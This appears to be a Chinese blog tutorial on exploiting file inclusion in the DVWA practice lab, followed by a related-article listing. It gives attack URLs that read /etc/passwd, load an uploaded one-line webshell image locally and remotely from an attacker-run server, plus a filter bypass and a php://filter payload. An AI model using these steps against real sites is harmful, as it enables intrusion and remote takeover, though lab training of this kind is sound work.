web安全--文件包含实例操作

最新推荐文章于 2024-05-12 23:02:18 发布
最新推荐文章于 2024-05-12 23:02:18 发布
阅读量442 收藏
点赞数
文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010625568/article/details/107029191
版权

文件包含分为LFI(本地文件包含)和RFL(远程文件包含)两种。文件包含的前提是服务器allow_url_openllow_url_include(LFI)或者allow_url_open(RFI)。在owasp环境中可以在/etc/php5/cli/php/ini查看。

同样进入owasp靶机的DVWA

1. 选择进入安全级别为low

2.进入file inclusion查看后端源码,该页面包含了一个include.php,可以尝试将本页面的链接http://192.168.3.94/dvwa/vulnerabilities/fi/?page=include.php   page=后的参数进行替换,e.g./etc/passwd等

 

 3. 制作一句话muma图片或者txt文件

4. 通过文件上传漏洞上传到靶机上,修改链接参数(LFI)

http://192.168.3.94/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/11.jpg

这样muma程序就已经被执行了,到此muma已经生成。查看/dvwa/vulnerabilities/fi/是否生成了muma的php文件。可以通过菜刀链接了 

5. RFI文件上传

开启kali的apache2服务器

systemctl start apache2.servicel/

查看服务器状态

systemctl status apache2.service

开启之后将制作好的muma图片放入服务器路径中,服务器默认路径为/var/www/html/

在本地查看图片 eg 192.168.3.95/11.jpg

6. 回到file inclusion 修改链接,参数改为服务器地址下的文件

http://192.168.3.94/dvwa/vulnerabilities/fi/?page=http://192.168.3.95/11.jpg

到此muma已经生成。查看/dvwa/vulnerabilities/fi/是否生成了muma的php文件

7. 中安全级别过滤处理了http://或者https://特殊字符串。对于LFI来说没有任何的影响,对于RFI来说,只要在http://任何地方插入一个http://。例如htthttp://p://即可。

u010625568
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一文读懂 Web 安全
u011192674的博客
07-28 869
Web 安全是互联网中不可或缺的一个领域,这个领域中诞生了大量的黑帽子与白帽子,他们都是安全领域的王者,在平时里,他们利用各种巧妙的技术互相博弈,时不时就会掀起一场 Web 安全浪潮,真可谓神仙打架,各显神通。 本文从一个吃瓜群众的角度,聊一聊 Web 安全的一些有趣故事。 安全世界观 安全攻防案例 总结与思考 安全世界观 在互联网发展之初,IE 浏览器垄断的时期,大家上网的目的都很单纯,主要通过浏览器分享信息,获取新闻。但随着互联网的不断发展发展,一个网页能做的事情越来越多,除了看新闻,我们还可以看视
web安全:通俗易懂,以实例讲述破解网站的原理及如何进行防护!如何让网站变得更安全。...
weixin_30575309的博客
09-05 368
本篇以我自己的网站为例来通俗易懂的讲述网站的常见漏洞,如何防止网站被入侵,如何让网站更安全。 要想足够安全,首先得知道其中的道理。 本文例子通俗易懂,主要讲述了各种漏洞 的原理及防护,相比网上其它的web安全入门文章来说,本文更丰富,更加具有实战性和趣味性。 本文讲解目录大致如下,讲述什么是暴力破解、xss、csrf、挂马等原理及对应的防护。           对手机验证码登录方式进...
文件包含DVWA实操
qq_45100746的博客
05-27 277
首先先将DVWA的等级调为LOW 1、包含系统文件 点击以下红框框的部分“file inclusion” 可以看到页面如下 先点击“file1.php” 看一下,发现URL中变成了file1.php 点击后面的file2.php也是同样的效果。所以我们尝试包含其他的文件,看看可以不可以成功。 我们将URL中改为一个文件,看到图中已有文件内容的显示。 验证一下,内容是否显示正确。找到输入的路径中的文件,发现文件内容与页面上的输出一致,则文件已包含。 2、包含上传文件 ..
文件包含实例
weixin_39157582的博客
02-14 427
0x03 实际案例 百度两处本地任意文件包含漏洞(证明可执行PHP代码) 中国移动通信集团新疆集团通讯录某处文件包含导致命令执行Getshell 华夏人寿某系统漏洞打包6020万用户数据受影响(SQL注入漏洞支持union、文件包含) 国航某系统存在任意文件包含漏洞 某税务系统存在通用型文件包含漏洞(涉及多个国税) 酷我音乐某系统修复不当存在任意文件包含漏洞 ...
文件包含原理及应用实例
weixin_44155363的博客
03-29 1293
文件包含原理: 原理 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当使用该函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 2、incl...
seatunnel-web-main
09-18
SeaTunnel-UI的压缩包文件"seatunnel-web-main"包含了整个Web应用程序的源代码和资源文件,这使得开发者可以根据自身需求对系统进行定制和扩展。通过阅读和修改源代码,我们可以了解其实现原理,添加新的功能模块,...
基于spring-boot的web项目实例
02-13
在项目实践中,你可能还需要集成其他组件,如Spring Data JPA进行数据库操作,Spring Security进行安全控制,或者Spring Cloud实现微服务架构。每个组件都有其丰富的功能和配置选项,可以根据实际需求进行选择和配置...
Web-安全渗透全套教程09文件包含漏.zip
05-22
【标题】Web安全渗透:文件包含漏洞详解 在网络安全领域,Web应用安全是至关重要的一环。本套教程专注于“文件包含漏洞”这一主题,旨在帮助学习者深入理解这种常见的安全威胁,以及如何防止和应对它。文件包含漏洞...
java源码包---java 源码 大量 实例
04-18
 Java二进制IO类与文件复制操作实例,好像是一本书的例子,源代码有的是独立运行的,与同目录下的其它代码文件互不联系,这些代码面向初级、中级Java程序员。 Java访问权限控制源代码 1个目标文件 摘要:Java源码,...
Web应用安全:远程文件包含利用.pptx
06-20
【远程文件包含(Remote File Inclusion,RFI)】是一种常见的Web应用安全漏洞,它允许攻击者通过操纵应用程序,使其包含并执行远程服务器上的文件。RFI与本地文件包含(Local File Inclusion,LFI)相似,不同之处...
文件包含漏洞-01】文件包含概述及实例——以PHP语言为例
m0_64378913的博客
06-15 907
定义:程序开发人员通常会把可重复使用的代码写到单个文件中,在使用该重复代码时,直接调用此文件,无需多次编写,这种调用文件的过程称为文件包含。 普适性:几乎所有脚本语言都会提供文件包含功能,本文主要以PHP语言为例进行介绍。(1)本文实验基于WAMP环境进行测试,环境部署过程参考文章《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》。 (2)在该环境网站根目录下,新建文件夹FileInclusion,在FileInclusion文件夹下新建以下文件进行实验。 (3)直接使用win20
web-文件包含
diemozao8175的博客
09-09 301
提示 构造payload ?file=flag.php 得到一串字符,那么我们用PHP伪协议尝试一下 构造payload ?file=php://filter/read=convert.base64-encode/resource=flag.php SSBoYXZlIGEgZmxhZyEKPD9waHAgCgovL0ZsYWc6IG...
Web文件包含
最新发布
q
05-12 989
包含的文件被当作当前的语言去代码执行漏洞原因:1.使用文件包含函数2.包含的文件可控分类:1.本地包含:​ 有文件利用:配合文件上传​ 无文件利用:​ 1.包含日志文件​ 2.包含session文件​ 3.伪协议利用2.远程包含:公网服务器自定义文件差异:代码过滤, allow_url_include配置开关白盒发现:包含函数黑盒发现:主要观察参数传递的数据和文件名是否对应。
web文件包含
YkingH的博客
10-07 1347
文件包含 文件包含漏洞原理 文件包含:程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用过程,称为文件包含文件包含漏洞:为使代码更加灵活,会将包含的文件设置为变量,用来进行动态调用,漏洞产生的原因正是函数通过变量引入文件时,没有对传入的文件名进行合理的校验,从而操作了意想之外的文件,导致文件泄露甚至恶意代码注入。 PHP: include(), include_once(), require(), require_once(), fopen(),
WEB 安全,浅谈 XSS 攻击(附简单实例
DisMisPres的博客
12-29 2797
为什么说一些网站上的弹出广告(一刀999)不要去点,特别是已经登录过的网站,个人信息的泄露等都很有可能是从这里泄露的。由于XSS这种攻击手法是很常见且基础的方式,目前大多数的web框架都对其做过适配了,我们也不需要太过担心这种安全问题,但是还是要知道有这么回事,并能够有相应的处理方案。现在大多数的项目都是前后端分离的,前后端都要对XSS有所了解,在实际开发中需要多考虑下这类安全问题。
常见Web安全事件
jeammy06061026的博客
05-14 2000
OWASP TOP10 OWASP: open web application security project,是世界范围内的非营利性组织,关注于提高软件系统的安全性。 注入攻击 XSS攻击
Web安全案例与开发规范
cuizao0418的博客
04-25 274
随着互联网时代的到来,web安全也越来越受到重视,为了实现企业内部的机密数据文件信息的管理,通过设置防火墙,入侵检测,防病毒软件等手段,对于来自外部网络的攻击和入侵做到了可观且有效的防御。但是传统信息安全领域主要关注由于...
文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
m0_64378913的博客
06-15 3080
概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。定义:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值